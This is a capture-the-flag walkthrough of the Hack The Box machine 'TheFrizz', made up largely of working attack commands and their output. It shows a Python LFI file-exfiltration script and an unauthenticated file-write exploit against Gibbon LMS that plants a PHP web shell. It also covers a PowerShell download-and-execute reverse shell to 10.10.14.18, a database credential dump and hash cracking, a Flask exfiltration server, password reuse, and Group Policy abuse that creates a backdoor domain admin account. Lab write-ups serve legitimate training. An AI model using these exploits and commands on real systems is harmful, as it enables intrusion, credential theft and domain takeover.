TheFrizz
Recon
HTTP (80)
frizz.htb redirects to frizzdc.frizz.htb which is just a landing page website.
Gibbon LMS
/Gibbon-LMS/ is serving Staff Login panel.
LFI
Gibbon v25.0.0 is vulnerable to a Local File Inclusion - CVE-2023-34598
Test: http://frizzdc.frizz.htb/Gibbon-LMS/?q=gibbon.sql
Download files
from requests import Session
from bs4 import BeautifulSoup as BS
from pathlib import Path
SAVE = Path('LFI Exfiltrate')
URL = 'http://frizzdc.frizz.htb/Gibbon-LMS/'
SAVE.mkdir(exist_ok=True)
with Session() as session:
while True:
file = input('Filename: ')
resp = session.get(URL, params={'q': file})
if 'the Gibbons have escaped!' in resp.text:
print("No such file")
continue
contents = BS(resp.text, 'html.parser').find('div', {'id': 'content'}).get_text(strip=True)
with open(SAVE / Path(file).name, 'w') as f:
f.write(contents)
print(f"Contents: {contents[:100]}")└─$ sudo mysql -u root
CREATE DATABASE gibbon;
CREATE USER 'gibbon_user'@'localhost' IDENTIFIED BY 'gibbon_user';
GRANT ALL PRIVILEGES ON gibbon.* TO 'gibbon_user'@'localhost';
FLUSH PRIVILEGES;
USE gibbon;
SOURCE ./LFI Exfiltrate/gibbon.sqlNothing in the database..
Except maybe potential username format used in DC?
└─$ feroxbuster -u 'http://frizzdc.frizz.htb/Gibbon-LMS/?q=' -k -w /usr/share/seclists/Discovery/Web-Content/common.txt --thorough -n -D -C 404,403,400 -S 0,34
200 GET 674l 5642w 35113c http://frizzdc.frizz.htb/Gibbon-LMS/LICENSE
301 GET 9l 30w 361c http://frizzdc.frizz.htb/Gibbon-LMS/Resources => http://frizzdc.frizz.htb/Gibbon-LMS/Resources/
301 GET 9l 30w 358c http://frizzdc.frizz.htb/Gibbon-LMS/Themes => http://frizzdc.frizz.htb/Gibbon-LMS/Themes/
301 GET 9l 30w 361c http://frizzdc.frizz.htb/Gibbon-LMS/installer => http://frizzdc.frizz.htb/Gibbon-LMS/installer/
200 GET 363l 1014w 22064c http://frizzdc.frizz.htb/Gibbon-LMS/index.php
301 GET 9l 30w 355c http://frizzdc.frizz.htb/Gibbon-LMS/lib => http://frizzdc.frizz.htb/Gibbon-LMS/lib/
200 GET 674l 5642w 35113c http://frizzdc.frizz.htb/Gibbon-LMS/license
301 GET 9l 30w 359c http://frizzdc.frizz.htb/Gibbon-LMS/modules => http://frizzdc.frizz.htb/Gibbon-LMS/modules/
200 GET 7l 39w 374c http://frizzdc.frizz.htb/Gibbon-LMS/preferences.php
200 GET 9l 55w 524c http://frizzdc.frizz.htb/Gibbon-LMS/privacypolicy.php
301 GET 9l 30w 361c http://frizzdc.frizz.htb/Gibbon-LMS/resources => http://frizzdc.frizz.htb/Gibbon-LMS/resources/
200 GET 54l 171w 2617c http://frizzdc.frizz.htb/Gibbon-LMS/report.php
200 GET 4l 8w 54c http://frizzdc.frizz.htb/Gibbon-LMS/robots.txt
200 GET 7l 39w 380c http://frizzdc.frizz.htb/Gibbon-LMS/notifications.php
301 GET 9l 30w 355c http://frizzdc.frizz.htb/Gibbon-LMS/src => http://frizzdc.frizz.htb/Gibbon-LMS/src/
301 GET 9l 30w 358c http://frizzdc.frizz.htb/Gibbon-LMS/themes => http://frizzdc.frizz.htb/Gibbon-LMS/themes/
301 GET 9l 30w 359c http://frizzdc.frizz.htb/Gibbon-LMS/uploads => http://frizzdc.frizz.htb/Gibbon-LMS/uploads/
200 GET 1364l 2928w 25809c http://frizzdc.frizz.htb/Gibbon-LMS/themes/Default/css/main.css
200 GET 16l 57w 660c http://frizzdc.frizz.htb/Gibbon-LMS/update.php
301 GET 9l 30w 358c http://frizzdc.frizz.htb/Gibbon-LMS/vendor => http://frizzdc.frizz.htb/Gibbon-LMS/vendor/
200 GET 17l 192w 10137c http://frizzdc.frizz.htb/Gibbon-LMS/resources/assets/css/theme.min.css
200 GET 137l 1035w 85530c http://frizzdc.frizz.htb/Gibbon-LMS/themes/Default/img/logo.png
200 GET 17l 1449w 863561c http://frizzdc.frizz.htb/Gibbon-LMS/resources/assets/css/core.min.css
200 GET 53l 226w 2845c http://frizzdc.frizz.htb/Gibbon-LMS/error.phpWe basically have access to all files from repository: https://github.com/GibbonEdu/core/tree/v25.0.00
.. is blocked, so no LFI outside application.
https://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=Gibbon
Arbitrary File Write
CVE-2023-45878: GibbonEdu Gibbon version 25.0.1 and before allows Arbitrary File Write because rubrics_visualise_saveAjax.phps does not require authentication. The endpoint accepts the img, path, and gibbonPersonID parameters. The img parameter is expected to be a base64 encoded image. If the path parameter is set, the defined path is used as the destination folder, concatenated with the absolute path of the installation directory. The content of the img parameter is base64 decoded and written to the defined file path. This allows creation of PHP files that permit Remote Code Execution (unauthenticated).
https://github.com/advisories/GHSA-r526-pvv3-w6p8 -> https://herolab.usd.de/security-advisories/usd-2023-0025/
File exists
└─$ curl http://frizzdc.frizz.htb/Gibbon-LMS/modules/Rubrics/rubrics_visualise_saveAjax.php -i
HTTP/1.1 200 OK
Date: Sun, 16 Mar 2025 10:49:11 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Set-Cookie: G60fa1cd0af7be78b=82pclbkbt74720uk1r30avct0v; path=/; HttpOnly; SameSite=Lax
X-Frame-Options: SAMEORIGIN
Pragma: no-cache
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Expires: Thu, 1 Jan 1970 00:00:00 GMT
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Use PoC to upload a shell
└─$ echo -n '<?php echo system($_REQUEST[0]); ?>' | basenc --base64url
PD9waHAgZWNobyBzeXN0ZW0oJF9SRVFVRVNUWzBdKTsgPz4=
└─$ curl http://frizzdc.frizz.htb/Gibbon-LMS/modules/Rubrics/rubrics_visualise_saveAjax.php -d 'img=image/png;asdf,PD9waHAgZWNobyBzeXN0ZW0oJF9SRVFVRVNUWzBdKTsgPz4=&path=letmein.php&gibbonPersonID=0000000001'
letmein.phpTest uploaded shell
└─$ curl http://frizzdc.frizz.htb/Gibbon-LMS/letmein.php -d '0=whoami'
frizz\w.webservice HTB cronjob deletes the web shell so it's better to upload reverse shell.
└─$ cp /opt/scripts/shells/ConPtyShell/Invoke-ConPtyShell.ps1 .
└─$ echo 'Invoke-ConPtyShell 10.10.14.18 4444;' >> Invoke-ConPtyShell.ps1
└─$ curl http://frizzdc.frizz.htb/Gibbon-LMS/modules/Rubrics/rubrics_visualise_saveAjax.php -d "img=image/png;asdf,$(echo '<?php echo system($_REQUEST[0]); ?>' | basenc --base64url)&path=letmein.php&gibbonPersonID=0000000001"
└─$ curl http://frizzdc.frizz.htb/Gibbon-LMS/letmein.php --data-urlencode '0=powershell -c IEX(IWR 10.10.14.18/Invoke-ConPtyShell.ps1 -UseBasicParsing)'Note: Make sure you have a listener and webserver up and running.
Reverse Shell (w.webservice)
└─$ stty raw -echo; (stty size; cat) | nc -lvnp 4444
listening on [any] 4444 ... connect to [10.10.14.18] from (UNKNOWN) [10.129.123.117] 65511
PS C:\xampp\htdocs\Gibbon-LMS> whoami /all
User Name SID
================== ==============================================
frizz\w.webservice S-1-5-21-2386970044-1145388522-2932701813-1120
Group Name Type SID Attributes
========================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE Well-known group S-1-5-6 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288
Privilege Name Description State
============================= ============================== ========
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set DisabledGet application config
PS C:\xampp\htdocs\Gibbon-LMS> cat .\config.php
...
$databaseServer = 'localhost';
$databaseUsername = 'MrGibbonsDB';
$databasePassword = 'MisterGibbs!Parrot!?1';
$databaseName = 'gibbon';
...Interestingly access to /Users is disabled, and mysql binary doesn't seem to exist on system.
PS C:\xampp\htdocs\Gibbon-LMS> ls /Users
ls : Access to the path 'C:\Users' is denied.
At line:1 char:1
+ ls /Users
+ ~~~~~~~~~
+ CategoryInfo : PermissionDenied: (C:\Users:String) [Get-ChildItem], UnauthorizedAccessException
+ FullyQualifiedErrorId : DirUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetChildItemCommandCorrection, mysql exists but it's not included in PATH
PS C:\xampp> ls .\mysql\bin\mysql.exe
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 10/30/2023 5:58 AM 3784616 mysql.exePS C:\xampp> \xampp\mysql\bin\mysql.exe -u'MrGibbonsDB' -p'MisterGibbs!Parrot!?1' gibbon -e 'SHOW DATABASES;'
+--------------------+
| Database |
+--------------------+
| gibbon |
| information_schema |
| test |
+--------------------+
PS C:\xampp> \xampp\mysql\bin\mysql.exe -u'MrGibbonsDB' -p'MisterGibbs!Parrot!?1' gibbon -e 'SHOW TABLES;'
...
PS C:\xampp> \xampp\mysql\bin\mysql.exe -u'MrGibbonsDB' -p'MisterGibbs!Parrot!?1' gibbon -e 'SELECT username,passwordStrong,passwordStrongSalt FROM gibbonperson'
+-----------+------------------------------------------------------------------+------------------------+
| username | passwordStrong | passwordStrongSalt |
+-----------+------------------------------------------------------------------+------------------------+
| f.frizzle | 067f746faca44f170c6cd9d7c4bdac6bc342c608687733f80ff784242b0b0c03 | /aACFhikmNopqrRTVz2489 |
+-----------+------------------------------------------------------------------+------------------------+# Format = HASH:SALT
➜ cat .\hashes.txt
067f746faca44f170c6cd9d7c4bdac6bc342c608687733f80ff784242b0b0c03:/aACFhikmNopqrRTVz2489
➜ .\hashcat.exe --identify .\hashes.txt
# | Name | Category
======+============================================================+======================================
1410 | sha256($pass.$salt) | Raw Hash salted and/or iterated
1420 | sha256($salt.$pass) | Raw Hash salted and/or iterated
22300 | sha256($salt.$pass.$salt) | Raw Hash salted and/or iterated
20720 | sha256($salt.sha256($pass)) | Raw Hash salted and/or iterated
21420 | sha256($salt.sha256_bin($pass)) | Raw Hash salted and/or iterated
1440 | sha256($salt.utf16le($pass)) | Raw Hash salted and/or iterated
20710 | sha256(sha256($pass).$salt) | Raw Hash salted and/or iterated
1430 | sha256(utf16le($pass).$salt) | Raw Hash salted and/or iterated
1450 | HMAC-SHA256 (key = $pass) | Raw Hash authenticated
1460 | HMAC-SHA256 (key = $salt) | Raw Hash authenticated
11750 | HMAC-Streebog-256 (key = $pass), big-endian | Raw Hash authenticated
11760 | HMAC-Streebog-256 (key = $salt), big-endian | Raw Hash authenticated
➜ .\hashcat.exe -a 0 -m 1410 .\hashes.txt .\rockyou.txt
Failed...
➜ .\hashcat.exe -a 0 -m 1420 .\hashes.txt .\rockyou.txt
067f746faca44f170c6cd9d7c4bdac6bc342c608687733f80ff784242b0b0c03:/aACFhikmNopqrRTVz2489:Jenni_Luvs_Magic23Creds:
f.frizzle:Jenni_Luvs_Magic23
HTTP (80) (Authenticated)
Credentials work for Gibbon, but there's nothing too interesting
Hmm... something about migrations
SMB
STATUS_NOT_SUPPORTED usually means Kerberos is required to authenticate in DC.
└─$ netexec smb frizzdc.frizz.htb -u f.frizzle -p 'Jenni_Luvs_Magic23'
SMB 10.129.123.117 445 10.129.123.117 [*] x64 (name:10.129.123.117) (domain:10.129.123.117) (signing:True) (SMBv1:False)
SMB 10.129.123.117 445 10.129.123.117 [-] 10.129.123.117\f.frizzle:Jenni_Luvs_Magic23 STATUS_NOT_SUPPORTED
└─$ netexec smb frizzdc.frizz.htb -u f.frizzle -p 'Jenni_Luvs_Magic23' -k
SMB frizzdc.frizz.htb 445 frizzdc [*] x64 (name:frizzdc) (domain:frizz.htb) (signing:True) (SMBv1:False)
SMB frizzdc.frizz.htb 445 frizzdc [-] frizz.htb\f.frizzle:Jenni_Luvs_Magic23 KRB_AP_ERR_SKEWFix clock skew and login
└─$ sudo ntpdate frizz.htb
2025-03-16 07:54:29.839372 (-0400) +25199.747085 +/- 0.035767 frizz.htb 10.129.123.117 s1 no-leap
CLOCK: time stepped by 25199.747085
└─$ echo $(( 25199.747085 / 3600 ))
6.9999297458333327
└─$ faketime -f +7h netexec smb frizzdc.frizz.htb -u f.frizzle -p 'Jenni_Luvs_Magic23' -k --shares
SMB frizzdc.frizz.htb 445 frizzdc [*] x64 (name:frizzdc) (domain:frizz.htb) (signing:True) (SMBv1:False)
SMB frizzdc.frizz.htb 445 frizzdc [+] frizz.htb\f.frizzle:Jenni_Luvs_Magic23
SMB frizzdc.frizz.htb 445 frizzdc [*] Enumerated shares
SMB frizzdc.frizz.htb 445 frizzdc Share Permissions Remark
SMB frizzdc.frizz.htb 445 frizzdc ----- ----------- ------
SMB frizzdc.frizz.htb 445 frizzdc ADMIN$ Remote Admin
SMB frizzdc.frizz.htb 445 frizzdc C$ Default share
SMB frizzdc.frizz.htb 445 frizzdc IPC$ READ Remote IPC
SMB frizzdc.frizz.htb 445 frizzdc NETLOGON READ Logon server share
SMB frizzdc.frizz.htb 445 frizzdc SYSVOL READ Logon server sharenetexec winrm was failing to login 🤔
└─$ faketime -f +7h netexec winrm frizzdc.frizz.htb -u f.frizzle -p 'Jenni_Luvs_Magic23' -k
[07:55:51] ERROR Exception while calling proto_flow() on target frizzdc.frizz.htb: ("Unpacked data doesn't match constant value 'b')\\xea\\xdbz\\xba,'' should be ''NTLMSSP\\x00''", 'When connection.py:176 unpacking field \' | "NTLMSSP\x00 | b\')\\xea\\xdbz\\xba,\'[:8]\'')WinRM (f.frizzle)
Configure kerberos (configure_krb5.py)
└─$ /opt/scripts/utils/configure_krb5.py frizz.htb frizzdc
[*] This script must be run as root
[*] Configuration Data:
[libdefault]
default_realm = FRIZZ.HTB
[realms]
FRIZZ.HTB = {
kdc = frizzdc.frizz.htb
admin_server = frizzdc.frizz.htb
}
[domain_realm]
frizz.htb = FRIZZ.HTB
.frizz.htb = FRIZZ.HTB
[!] Above Configuration will overwrite /etc/krb5.conf, are you sure? [y/N] y
[+] /etc/krb5.conf has been configuredFrom the future: TIL NetExec > SMB protocol Enumeration > Generate krb5 conf file
└─$ faketime -f +7h impacket-getTGT -dc-ip 'frizzdc.frizz.htb' 'frizz.htb'/'f.frizzle':'Jenni_Luvs_Magic23' -k
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Saving ticket in f.frizzle.ccache
└─$ export KRB5CCNAME=$(readlink -f ./f.frizzle.ccache)
└─$ faketime -f +7h evil-winrm -i frizzdc.frizz.htb -r frizz.htb
Evil-WinRM shell v3.5
*Evil-WinRM* PS C:\Users\f.frizzle\Documents> whoami /all
User Name SID
=============== ==============================================
frizz\f.frizzle S-1-5-21-2386970044-1145388522-2932701813-1103
Group Name Type SID Attributes
========================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label S-1-16-8192
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set EnabledFrom the future about SSH -> Weird flex from Windows I guess
Works: faketime -f +7h ssh f.frizzle@frizzdc.frizz.htb
Doesn't Work: faketime -f +7h ssh f.frizzle@frizz.htb (No DC)
Also note about SSH, if you make yourself admin you no longer can SSH... 😳
*Evil-WinRM* PS C:\Users\M.SchoolBus\Documents> cat \ProgramData\ssh\sshd_config | sls -notmatch '#|^$'
LoginGraceTime 1m
PermitRootLogin no
StrictModes yes
MaxSessions 3
PubkeyAuthentication no
AuthorizedKeysFile .ssh/authorized_keys
HostbasedAuthentication no
IgnoreUserKnownHosts yes
IgnoreRhosts yes
PasswordAuthentication no
PermitEmptyPasswords no
GSSAPIAuthentication yes
AllowAgentForwarding no
AllowTcpForwarding no
PermitTTY yes
PrintMotd yes
ClientAliveInterval 120
ClientAliveCountMax 3
PermitTunnel no
Banner "This is a production server, not a field trip. Please be responsible. -Marvin"
Subsystem sftp sftp-server.exe
Subsystem powershell C:/progra~1/powershell/7/pwsh.exe -sshs
Match Group administrators
AuthorizedKeysFile __PROGRAMDATA__/ssh/administrators_authorized_keys
DenyGroups "Frizz/Administrators"
AllowGroups "Frizz/Remote Management Users"
AllowUsers Frizz/m.schoolbus Frizz/f.frizzleUser.txt
*Evil-WinRM* PS C:\Users\f.frizzle> cat Desktop/user.txt
d85a04eb3d8b99b16c2b76df607701d8WinRM (M.SchoolBus)
Enumerate with winpeas
*Evil-WinRM* PS C:\Users\f.frizzle\Music> curl.exe 10.10.14.18/wp.exe -O
*Evil-WinRM* PS C:\Users\f.frizzle\Music> .\wp.exe | tee -filepath wp.log
...
ÉÍÍÍÍÍÍÍÍÍ͹ Scheduled Applications --Non Microsoft--
È Check if you can modify other users scheduled binaries https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.html
(frizz\administrator) Frizz-Cleanup: powershell -e c2V0LWNvbnRlbnQgLXZhbHVlICI5YTQyZGU2YzM0YjU0YWRjYjc0MWFiYmIyNzAwZGQ4MiIgLXBhdGggImM6XHVzZXJzXGYuZnJpenpsZVxkZXNrdG9wXHVzZXIudHh0Igokc2hlbGw9bmV3LW9iamVjdCAtY29tIHNoZWxsLmFwcGxpY2F0aW9uCiRiaW4gPSAkc2hlbGwubmFtZXNwYWNlKDB4YSkKaWYoKGAkYmluLml0ZW1zKCl8bWVhc3VyZSkuY291bnQgLWx0IDEpewokaXRlbSA9ICRzaGVsbC5uYW1lc3BhY2UoMCkucGFyc2VuYW1lKCJDOlx1c2Vyc1xmLmZyaXp6bGVcQXBwRGF0YVxMb2NhbFxUZW1wXE15TWlsZXNfQmV0YS56aXAiKQokaXRlbS5pbnZva2V2ZXJiKCJkZWxldGUiKQ==
Trigger: At system startup-After triggered, repeat every 00:05:00 indefinitely.Recycle Bin
Cronjob:
set-content -value "9a42de6c34b54adcb741abbb2700dd82" -path "c:\users\f.frizzle\desktop\user.txt"
$shell=new-object -com shell.application
$bin = $shell.namespace(0xa)
if((`$bin.items()|measure).count -lt 1){
$item = $shell.namespace(0).parsename("C:\users\f.frizzle\AppData\Local\Temp\MyMiles_Beta.zip")
$item.invokeverb("delete")The above file doesn't exist and after waiting for few minutes it doesn't appear so there's no cronjob which does backups or smth.
Using the Shell.Application COM object, $shell.Namespace(0xA) refers to the Recycle Bin.
But there's something else in Recycle Bin
PS C:\users\f.frizzle\music> (New-Object -ComObject Shell.Application).Namespace(0xA).Items() | Format-Table Name, Path
Name Path
---- ----
wapt-backup-sunday.7z C:\$RECYCLE.BIN\S-1-5-21-2386970044-1145388522-2932701813-1103\$RE2XMEG.7zI wasn't able to make impacket-smbserver work, so to download I created simple server which accepts files.
from flask import Flask, request
from pathlib import Path
SAVE_LOCATION = Path('./www')
SAVE_LOCATION.mkdir(exist_ok=True)
app = Flask(__name__)
@app.route('/', methods=['POST'])
def upload_file():
if 'file' not in request.files:
return 'No file part', 400
file = request.files['file']
if file.filename == '':
return 'No selected file', 400
if file:
filename = Path(file.filename).name
file.save(SAVE_LOCATION / filename)
return 'File uploaded successfully', 200
if __name__ == '__main__':
app.run(host='0.0.0.0', port=8000, debug=False)PS C:\users\f.frizzle\music> curl.exe 10.10.14.18:8000 -F 'file=@wapt-backup-sunday.7z'
File uploaded successfullyWAPT
Unzip
└─$ 7z x wapt-backup-sunday.7zProject seems to be using https://github.com/tranquilit/WAPT: WAPT is an established method for managing the lifecycle of an installed base of Windows applications. WAPT has many similarities with Debian's APT software manager, thus its name. WAPT is particularly useful to system administrators who are tired of repetitive and low value tasks.
Not sure what kind of modifications have been made to project, but there's configuration which contains password
It's somewhat password like password ?
└─$ echo 'IXN1QmNpZ0BNZWhUZWQhUgo=' | base64 -d
!suBcig@MehTed!RPassword Reuse
Get other users
PS C:\users\f.frizzle\music> Get-LocalUser | Select-Object -ExpandProperty Name
Administrator
Guest
krbtgt
f.frizzle
w.li
h.arm
M.SchoolBus
d.hudson
k.franklin
l.awesome
t.wright
r.tennelli
J.perlstein
a.perlstein
p.terese
v.frizzle
g.frizzle
c.sandiego
c.ramon
m.ramon
w.WebserviceTest for password reuse.
└─$ faketime -f +7h netexec smb frizzdc.frizz.htb -u users.txt -p '!suBcig@MehTed!R' -k --continue-on-success
...
SMB frizzdc.frizz.htb 445 frizzdc [+] frizz.htb\M.SchoolBus:!suBcig@MehTed!R
...Shell
└─$ faketime -f +7h impacket-getTGT -dc-ip 'frizzdc.frizz.htb' 'frizz.htb'/'M.SchoolBus':'!suBcig@MehTed!R' -k
└─$ export KRB5CCNAME=$(readlink -f ./M.SchoolBus.ccache)
└─$ faketime -f +7h evil-winrm -i frizzdc.frizz.htb -r frizz.htb
*Evil-WinRM* PS C:\Users\M.SchoolBus\Documents> whoami /all
User Name SID
================= ==============================================
frizz\m.schoolbus S-1-5-21-2386970044-1145388522-2932701813-1106
Group Name Type SID Attributes
============================================ ================ ============================================== ===============================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
frizz\Desktop Admins Group S-1-5-21-2386970044-1145388522-2932701813-1121 Mandatory group, Enabled by default, Enabled group
frizz\Group Policy Creator Owners Group S-1-5-21-2386970044-1145388522-2932701813-520 Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1 Mandatory group, Enabled by default, Enabled group
frizz\Denied RODC Password Replication Group Alias S-1-5-21-2386970044-1145388522-2932701813-572 Mandatory group, Enabled by default, Enabled group, Local Group
Mandatory Label\Medium Mandatory Level Label S-1-16-8192
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set EnabledGet data for bloodhound
└─$ faketime -f +7h bloodhound-python -u 'M.SchoolBus' -p '!suBcig@MehTed!R' -d frizz.htb -ns 10.129.123.117 -dc frizzdc.frizz.htb -c all --zip -k
INFO: Found AD domain: frizz.htb
INFO: Using TGT from cache
INFO: Found TGT with correct principal in ccache file.
INFO: Connecting to LDAP server: frizzdc.frizz.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: frizzdc.frizz.htb
INFO: Found 22 users
INFO: Found 53 groups
INFO: Found 2 gpos
INFO: Found 2 ous
INFO: Found 20 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: frizzdc.frizz.htb
INFO: Done in 00M 16S
INFO: Compressing output into 20250316112848_bloodhound.zip
The owned users don't have any outbound permissions, let's check groups.
Group Policy Creator Owners: This group is authorized to create, edit, and delete Group Policy Objects in the domain. By default, the only member of the group is Administrator.
https://www.thehacker.recipes/ad/movement/group-policies
PS C:\Users\M.SchoolBus\Documents> Get-GPO -All
DisplayName : Default Domain Policy
DomainName : frizz.htb
Owner : frizz\Domain Admins
Id : 31b2f340-016d-11d2-945f-00c04fb984f9
GpoStatus : AllSettingsEnabled
Description :
CreationTime : 10/29/2024 7:19:24 AM
ModificationTime : 10/29/2024 7:25:44 AM
UserVersion : AD Version: 0, SysVol Version: 0
ComputerVersion : AD Version: 2, SysVol Version: 2
WmiFilter :
DisplayName : Default Domain Controllers Policy
DomainName : frizz.htb
Owner : frizz\Domain Admins
Id : 6ac1786c-016f-11d2-945f-00c04fb984f9
GpoStatus : AllSettingsEnabled
Description :
CreationTime : 10/29/2024 7:19:24 AM
ModificationTime : 10/29/2024 7:19:24 AM
UserVersion : AD Version: 0, SysVol Version: 0
ComputerVersion : AD Version: 1, SysVol Version: 1
WmiFilter :
PS C:\Users\M.SchoolBus\Documents> New-GPO -Name "Nothing2See"
DisplayName : Nothing2See
DomainName : frizz.htb
Owner : frizz\M.SchoolBus
Id : 41f36df0-1662-49f9-bdb9-968a54ac3073
GpoStatus : AllSettingsEnabled
Description :
CreationTime : 3/16/2025 10:22:14 AM
ModificationTime : 3/16/2025 10:22:14 AM
UserVersion : AD Version: 0, SysVol Version: 0
ComputerVersion : AD Version: 0, SysVol Version: 0
WmiFilter :
└─$ curl -LOs https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/26a0757612e5654b4f792b012ab8f10f95d391c9/Recon/PowerView.ps1
*Evil-WinRM* PS C:\Users\M.SchoolBus\Documents> IEX(IWR 10.10.14.18/PowerView.ps1 -UseBasicParsing)
PS C:\Users\M.SchoolBus\Documents> New-GPOImmediateTask -Verbose -Force -TaskName 'Test' -GPODisplayName 'Nothing2See' -Command cmd -CommandArguments "/c net user letmein Password123 /add /domain && net group 'Domain Admins' letmein /add /domain && net group 'Enterprise Admins' letmein /add /domain && net localgroup Administrators letmein /add && net localgroup 'Remote Management Users' letmein /add"
VERBOSE: Get-DomainSearcher search string: LDAP://DC=frizz,DC=htb
VERBOSE: Trying to weaponize GPO: {41F36DF0-1662-49F9-BDB9-968A54AC3073}
PS C:\Users\M.SchoolBus\Documents> gpupdate /force
Updating policy...
Computer Policy update has completed successfully.
User Policy update has completed successfully.Note: Use the version provided in HackerRecipies, because latest PowerView doesn't have this function.
With PowerView nothing was changed or updated...
pyGPOAbuse also kept failing due to connection errors
└─$ faketime -f +7h pygpoabuse 'frizz.htb'/'M.SchoolBus':'!suBcig@MehTed!R' -gpo-id '8a6ec73d-b29a-447b-b820-3057f389393c' -command 'net user letmein Password123$ /add' -f -v -k -ccache M.SchoolBus.ccache└─$ cp /opt/scripts/exploit/SharpGPOAbuse/SharpGPOAbuse.exe ./www
PS C:\Users\M.SchoolBus\Music> curl.exe 10.10.14.18/SharpGPOAbuse.exe -O
PS C:\Users\M.SchoolBus\Music> New-GPO -Name "Nothing2See"
PS C:\Users\M.SchoolBus\Music> .\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount m.schoolbus --GPOName "Nothing2See"
[+] Domain = frizz.htb
[+] Domain Controller = frizzdc.frizz.htb
[+] Distinguished Name = CN=Policies,CN=System,DC=frizz,DC=htb
[+] SID Value of m.schoolbus = S-1-5-21-2386970044-1145388522-2932701813-1106
[+] GUID of "Nothing2See" is: {3AC5E58D-A78C-4182-85CE-728C73222475}
[+] Creating file \\frizz.htb\SysVol\frizz.htb\Policies\{3AC5E58D-A78C-4182-85CE-728C73222475}\Machine\Microsoft\Windows NT\SecEdit\GptTmpl.inf
[+] versionNumber attribute changed successfully
[+] The version number in GPT.ini was increased successfully.
[+] The GPO was modified to include a new local admin. Wait for the GPO refresh cycle.
[+] Done!
*Evil-WinRM* PS C:\Users\M.SchoolBus\Music> gpupdate /force
Updating policy...
Computer Policy update has completed successfully.
User Policy update has completed successfully.Still nothing. After going over few things I found https://github.com/3gstudent/Homework-of-Powershell/tree/master?tab=readme-ov-file#new-gpoimmediatetaskps1. New-GPO only creates GPO and never applies to domain itself, hence it was failing since it was never listed in GPO Update.
New-GPO "Nothing2See" | New-GPLink -Target "dc=frizz,dc=htb"
\Users\M.SchoolBus\Music\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount m.schoolbus --GPOName "Nothing2See" --Force
gpupdate /force
whoami /groups | sls Administrators
BUILTIN\Administrators Alias S-1-5-32-544 Mandatory group, Enabled by default, Enabled group, Group ownerRoot.txt
PS C:\Users\M.SchoolBus\Music> cat /Users/Administrator/Desktop/root.txt
bfa493772fde11d97703fcbf46dd5852Bonkers
Instead of becoming admin I wanted to add a highest level administrator with Remote PS ability.
@echo off
set "username=letmein"
set "password=Password123$"
net user %username% %password% /add /domain
net group "Domain Admins" %username% /add /domain
net group "Enterprise Admins" %username% /add /domain
net localgroup Administrators %username% /add
net localgroup "Remote Management Users" %username% /addUse base64 to write to file, since text editors don't exist for Windows (?)
